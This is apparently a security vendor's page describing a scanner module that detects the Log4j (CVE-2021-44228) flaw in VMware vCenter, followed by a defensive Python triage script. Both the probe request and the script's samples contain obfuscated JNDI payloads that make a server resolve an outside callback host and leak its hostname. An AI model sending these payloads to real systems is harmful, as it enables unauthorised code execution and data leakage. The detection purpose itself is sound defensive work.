Automate Recon and scanning process with Vidoc. All security teams in one place
By kannthu
The "VMware VCenter - Remote Code Execution (Apache Log4j)" module is designed to detect the vulnerability in VMware vCenter that allows remote code execution through the Apache Log4j logging library. This vulnerability, identified as CVE-2021-44228, has a critical severity level and can be exploited by attackers to execute malware and obtain sensitive information.
If successfully exploited, this vulnerability can have severe consequences: attackers can execute arbitrary code on the affected system, leading to data breaches, unauthorized access, and system compromise. It is crucial to address this vulnerability promptly to prevent potential damage.
The module works by sending HTTP requests to the target VMware vCenter system and applying specific matching conditions to identify the presence of the vulnerability. One example of an HTTP request used by the module is:
GET /websso/SAML2/SSO/vsphere.local?SAMLRequest= HTTP/1.1
Host: <Hostname>
X-Forwarded-For: ${jndi:${lower:d}n${lower:s}://${env:hostName}.{%InteractionURL%}}
The module uses two matching conditions to determine if the vulnerability is present:
- The first condition checks for the presence of the "dns" protocol in the interaction.
- The second condition uses a regular expression to match a specific pattern in the interaction request.
If both conditions are met, the module reports the vulnerability, indicating the need for immediate action to mitigate the risk.
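As an added example (not Vidoc's module code), the following Python shows the defender's side of the same pattern: a triage routine that unwinds the ${lower:..}/${upper:..} wrappers the probe above relies on, flags logged request headers that carry a JNDI lookup, and reports which transport (dns, ldap, ...) the lookup names, which is the signal a detection rule or WAF would key on. The list of logged headers, the callback hostnames and the sample requests are constructed assumptions, not captured traffic.

```python
import re
from typing import Dict, List, Optional

# Innermost ${lower:x} / ${upper:x} lookups, i.e. ones with no further braces
# inside them; repeated substitution unwinds nested ones from the inside out.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}")

# A JNDI lookup followed by the transport it would use (dns, ldap, rmi, ...).
# Applied after normalisation so split-up keywords are already joined.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]*)", re.IGNORECASE)

# Headers that commonly end up in server log lines and hence in Log4j.
# Assumed list: extend it with whatever your application actually logs.
LOGGED_HEADERS = ("x-forwarded-for", "user-agent", "referer", "x-api-version")


def normalise(value: str, max_rounds: int = 10) -> str:
    """Collapse ${lower:..}/${upper:..} wrappers so a keyword split into
    pieces, e.g. ${lower:d}n${lower:s}, reads as the literal it expands to."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(),
            value,
        )
        if new == value:  # nothing left to unwind
            break
        value = new
    return value


def jndi_protocol(value: str) -> Optional[str]:
    """Return the transport named in a JNDI lookup ('dns', 'ldap', ...),
    '' if the lookup names none, or None if the value holds no lookup."""
    m = _JNDI_LOOKUP.search(normalise(value))
    return m.group(1).lower() if m else None


def scan_headers(headers: Dict[str, str]) -> List[Dict[str, str]]:
    """Flag every logged header in one request that carries a JNDI lookup."""
    findings = []
    for name, value in headers.items():
        if name.lower() not in LOGGED_HEADERS:
            continue
        proto = jndi_protocol(value)
        if proto is not None:
            findings.append({"header": name, "protocol": proto, "normalised": normalise(value)})
    return findings


# Constructed sample requests (not captured traffic): the first carries the
# split-keyword shape of the module's probe with a dns transport, the second
# the same shape with an ldap transport, the third is a plain client address.
SAMPLE_REQUESTS = [
    {"Host": "vcenter.example.test",
     "X-Forwarded-For": "${jndi:${lower:d}n${lower:s}://${env:hostName}.callback.example.test}"},
    {"Host": "vcenter.example.test",
     "User-Agent": "${jndi:${lower:l}d${lower:a}p://callback.example.test/a}"},
    {"Host": "vcenter.example.test", "X-Forwarded-For": "203.0.113.5"},
]


def triage(requests: List[Dict[str, str]]) -> List[List[Dict[str, str]]]:
    """Run scan_headers over a batch of requests; one findings list per request."""
    return [scan_headers(r) for r in requests]


if __name__ == "__main__":
    for i, findings in enumerate(triage(SAMPLE_REQUESTS)):
        print(i, findings or "clean")
```

Normalising before matching is the point: a rule that looks for the literal string "jndi:dns" never fires on the probe shown above, because "dns" only exists after the ${lower:..} lookups are resolved. The round limit keeps a deliberately deep nesting from turning triage into a CPU sink.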